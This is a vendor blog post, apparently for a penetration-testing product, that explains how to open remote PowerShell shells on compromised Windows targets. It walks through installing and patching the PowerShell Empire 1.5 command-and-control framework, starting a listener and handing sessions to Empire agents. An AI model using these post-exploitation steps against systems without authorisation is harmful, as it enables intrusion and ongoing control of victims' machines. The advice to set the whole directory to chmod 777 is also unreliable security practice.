We’re releasing the new version of Core Impact shortly, with some exciting new features. I can’t speak for anyone but myself but the single most exciting new feature in Impact 2017 is our new ability to launch Powershell natively on target systems. PowerShell is an incredibly well-designed tool for exploiting Windows systems.

 

When you have an agent on a system that supports Powershell (and has it installed), all you have to do is right click on the Agent, and select PowerShell Shell from the context menu to get a full remote PowerShell on the target.

 

powershell example

powershell example

 

You can also type #help to figure out what you’re doing.

 

This also presents me the opportunity to present something else that’s awesome. There is a most-excellent pure-Powershell post-exploitation tool called Powershell Empire. With this version of Impact, we’re also releasing the capability to pass a session from an Impact agent to a Powershell Empire agent. Since Powershell Empire’s command and control functionality doesn’t run on Windows, we’re going to have to build a Virtual Machine for it which I’ve documented step by step for you.

 

First, go ahead and download Ubuntu 14.04.5 LTS from http://releases.ubuntu.com/14.04/. Though this isn’t the latest and greatest version, this is the base build that our Quality Assurance team has validated it on. When I get a moment, I’ll write up instructions for successfully operating on the newer release.

 

Go ahead and spin up a virtual machine on the platform of your choice, and start the installation. It’s important to understand that your Impact system needs to be able to communicate with BOTH the Empire system and the target, and the target must be able to communicate back to the Impact system and the Empire system. So, if something doesn’t want to talk to something else, please check your network configuration for NATing first.

 

Since I’m using VMware Workstation as my virtualization platform, I get to cheat and grab a caffeinated beverage while it does the hard work of installing Ubuntu with the default settings, and installing open-vm-tools so that it plays nicely with the hypervisor. If you aren’t leveraging similar automation, make sure that you run sudo apt-get install open-vm-tools and reboot to make sure that the VM knows it’s a VM. (Yes, I’ve spent hours troubleshooting crappy VM performance before I realized that I forgot to install the tools. Please take a moment to laugh, and learn from my personal misfortune as part of your continued professional development.

 

Once you’ve completed the installation, pop a terminal window with Ctrl-Alt-T, and run the command sudo apt-get update.

powershell

microsoft powershell

 

Go grab another beverage and enjoy it while you wait.

 

Next:

sudo apt-get install python-pip

wget https://github.com/adaptivethreat/Empire/archive/1.5.tar.gz

tar -xzvf 1.5.tar.gz

cd Empire-1.5

sudo ./setup/install.sh

 

At this point, the install script will prompt you for permission to install dependencies. I suggest you say “Yes” if you want a functional installation at the end of the exercise. In fact, it’ll ask you several times. So don’t wander off for a long lunch while this is brewing…

 

When it finishes, it’ll prompt you for a server password, which you will want to remember.

 

Now for the hard part: We need to apply patches to the default Powershell Empire 1.5 installation so that our session passing will work. Thankfully, these are two single line changes.

 

First, we’re going to fire up our preferred text editor and look at lib/common/stagers.py, and go to line 127:

microsoft powershell

microsoft powershell code

 

 

You need to update the line to look like this:

 

     def generate_stager_hop(self, server, key, encrypt=True, encode=False):

 

The second file is data/agent/stager_hop.ps1

 

11.29.3-blog.png

 

 

The final line needs to be updated so that it reads:

 

} Start-Negotiate -s “REPLACE_SERVER” -SK ‘REPLACE_STAGING_KEY’ -UA $u;

 

 

Finally, you’ll want to set the permissions on the entire Empire-1.5 directory. chmod -R 777 Empire-1.5

Now we’re ready to start up the Empire console and server. You’ll want to start another terminal session in the VM, so that you have both components available to watch.

 

 

In the first, you’ll navigate to the Empire-1.5 directory, then run ./empire

 

In the second, also make sure that you’re in the Empire-1.5 directory, and run ./empire —rest —password Password

 

Pick your own password, of course…

 

powershell empire coding steps

powershell empire coding steps

 

 

 

Inside the Empire console, enter the following commands:

 

listeners

set Name StartingListener

Run

 

Now, we can pop back over into Impact where I’ve already placed an Impact agent a Windows 2008 Server with Powershell installed. I’ll go ahead and drag the Deploy Powershell Empire Agent module onto the target server.

 

core impact

core impact with powershell

 

After a few moments, if nothing goes wrong, you’ll see a success message in the Module Log:

 

core impact powershell example

powershell example with core impact

 

And over on the Powershell Empire machine you’ll see a message in the console like so:

 

powershell empire machine

powershell empire machine

 

 

From the Empire console, type agents to go into the agents menu.

 

To work with the Empire agent, type interact <agentname>. Protip: You can use tab completion to fill in the agent name, or rename it to be something more readily memorable.